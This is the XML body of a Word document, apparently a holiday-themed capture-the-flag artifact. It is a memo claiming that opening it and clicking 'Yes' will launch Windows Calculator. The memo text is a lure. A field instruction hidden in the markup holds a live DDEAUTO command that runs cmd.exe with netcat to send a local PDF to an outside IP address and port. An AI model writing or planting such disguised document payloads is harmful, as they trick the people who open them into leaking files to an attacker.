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bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:p w:rsidR="00F67766" w:rsidRDefault="00FA7928"><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>1828800</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>114300</wp:posOffset></wp:positionV><wp:extent cx="4572000" cy="1914525"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="7" name="Text Box 28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4572000" cy="19145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Pr="001729CA" w:rsidRDefault="001729CA" w:rsidP="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr></w:pP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E</w:t></w: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O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id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe"><v:stroke joinstyle="miter"/><v:path gradientshapeok="t" o:connecttype="rect"/></v:shapetype><v:shape id="Text Box 28" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:2in;margin-top:9pt;width:5in;height:1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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p w:rsidR="00F67766" w:rsidRPr="001729CA" w:rsidRDefault="001729CA" w:rsidP="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr></w:pP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E</w:t></w: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O</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>-571500</wp:posOffset></wp:positionV><wp:extent cx="2532380" cy="2820670"/><wp:effectExtent l="0" t="0" r="1270" b="0"/><wp:wrapNone/><wp:docPr id="6" name="Text Box 3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2532380" cy="2820670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Default="00FA7928"><w:r><w:rPr><w:noProof/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="2352675" cy="2733675"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Picture 1" descr="xmas_tre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xmas_tree"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId7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352675" cy="2733675"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing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id="Text Box 31" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:-45pt;width:199.4pt;height:22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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p w:rsidR="00F67766" w:rsidRDefault="00FA7928"><w:r><w:rPr><w:noProof/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="2352675" cy="2733675"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Picture 1" descr="xmas_tre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xmas_tree"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId8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352675" cy="2733675"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-1257300</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>-914400</wp:posOffset></wp:positionV><wp:extent cx="7886700" cy="228600"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="5" name="Rectangle 3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><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="7886700" cy="228600"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:solidFill><a:srgbClr val="89AA00"/></a:solidFill><a:ln><a:noFill/></a:ln><a:extLs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rect w14:anchorId="7A6F33F3" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-99pt;margin-top:-1in;width:62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" fillcolor="#89aa00" stroked="f"/></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00FA7928"><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-3543300</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>103505</wp:posOffset></wp:positionV><wp:extent cx="0" cy="1371600"/><wp:effectExtent l="9525" t="9525" r="9525" b="9525"/><wp:wrapNone/><wp:docPr id="4" name="Line 8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0" cy="1371600"/></a:xfrm><a:prstGeom prst="line"><a:avLst/></a:prstGeom><a:noFill/><a:ln w="12700"><a:solidFill><a:srgbClr val="FFFFFF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154CF63E" id="Line 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9pt,8.15pt" to="-279pt,116.1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" strokecolor="white" strokeweight="1pt"/></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="003A446E"><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:instrText xml:space="preserve">  </w:instrText></w:r><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:fldChar w:fldCharType="end"/></w:r></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/><w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/><w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/><w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/><w:p w:rsidR="00F67766" w:rsidRDefault="003A446E"><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r w:rsidRPr="003A446E"><w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc 10.142.0.11:44665 < C:/GreatBookPage7.pdf"</w:instrText></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r><w:r w:rsidR="00FA7928"><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>166370</wp:posOffset></wp:positionV><wp:extent cx="7086600" cy="1638300"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="3" name="Text Box 10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7086600" cy="1638300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Default="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>TO: Wunorse Openslae</w:t></w:r></w:p><w:p w:rsidR="001729CA" w:rsidRDefault="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>FROM: Shinny Upatree</w:t></w:r></w:p><w:p w:rsidR="001729CA" w:rsidRDefault="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>Subject: Reminder for Calculator Access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id="Text Box 10" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:13.1pt;width:558pt;height:12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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p w:rsidR="00F67766" w:rsidRDefault="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>TO: Wunorse Openslae</w:t></w:r></w:p><w:p w:rsidR="001729CA" w:rsidRDefault="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>FROM: Shinny Upatree</w:t></w:r></w:p><w:p w:rsidR="001729CA" w:rsidRDefault="001729CA"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>Subject: Reminder for Calculator Access</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/><w:p w:rsidR="00F67766" w:rsidRDefault="00FA7928"><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:noProof/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:noProof/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>466725</wp:posOffset></wp:positionV><wp:extent cx="6781800" cy="3686175"/><wp:effectExtent l="0" t="0" r="0" b="9525"/><wp:wrapNone/><wp:docPr id="2" name="Text Box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6781800" cy="36861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I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.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Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.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Please try not to delete this document as well.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Sincerely,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3E5FA0" w:rsidP="001729CA"><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Shinny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id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe"><v:stroke joinstyle="miter"/><v:path gradientshapeok="t" o:connecttype="rect"/></v:shapetype><v:shape id="Text Box 2" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:36.75pt;width:534pt;height:29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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p w:rsidR="00F67766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I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.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Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.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Please try not to delete this document as well.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Sincerely,</w:t></w:r></w:p><w:p w:rsidR="001729CA" w:rsidRPr="001729CA" w:rsidRDefault="001729CA" w:rsidP="001729CA"><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:bookmarkStart w:id="1" w:name="_GoBack"/><w:bookmarkEnd w:id="1"/></w:p><w:p w:rsidR="001729CA" w:rsidRPr="001729CA" w:rsidRDefault="003E5FA0" w:rsidP="001729CA"><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>Shinny</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:sectPr w:rsidR="00F67766"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
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4C" w:rsidRDefault="0083494C" w:rsidP="001729CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0083494C" w:rsidRDefault="0083494C" w:rsidP="0017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nk BT">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="00"/>
    <w:family w:val="script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4C" w:rsidRDefault="0083494C" w:rsidP="001729CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0083494C" w:rsidRDefault="0083494C" w:rsidP="0017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7927"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E520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1DC0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2FCA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noPunctuationKerning/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="11265">
      <o:colormru v:ext="edit" colors="#069,#369,#099,#09c,#930,#89aa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CA"/>
    <w:rsid w:val="001729CA"/>
    <w:rsid w:val="002C6B4B"/>
    <w:rsid w:val="003A446E"/>
    <w:rsid w:val="003E5FA0"/>
    <w:rsid w:val="00680303"/>
    <w:rsid w:val="007F5ABE"/>
    <w:rsid w:val="0083494C"/>
    <w:rsid w:val="00880834"/>
    <w:rsid w:val="009F1668"/>
    <w:rsid w:val="00F67766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#069,#369,#099,#09c,#930,#89aa00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FFFFFF"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color w:val="FFFFFF"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color w:val="33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rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:color w:val="003366"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:line="280" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="003366"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rPr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29CA"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet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29CA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86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2017-11-27T19:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-27T19:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>